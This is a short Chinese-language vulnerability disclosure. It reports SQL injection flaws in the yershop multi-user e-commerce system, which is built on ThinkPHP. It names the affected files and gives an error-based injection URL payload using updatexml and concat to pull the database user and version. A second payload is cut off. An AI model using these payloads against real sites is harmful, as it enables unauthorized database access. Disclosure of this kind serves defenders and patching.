yershop多用户商城系统 Driver.class.php等多处SQL注入漏洞
0x01漏洞简介 yershop是采用thinkphp框架开发的一套商城系统。其在以下3处存在SQL注入漏洞: 1Driver.class.php 可以通过以下的payload进行注入: index.php?c=Article&a=index&category0==1 or updatexml1,concat1,select concatuser,1,version,1%23in&category1=xxxx 2TuanController.class.php 可以通过以下的payload进行注入: /index.php?c=Tuan&a=category&id0==1 or...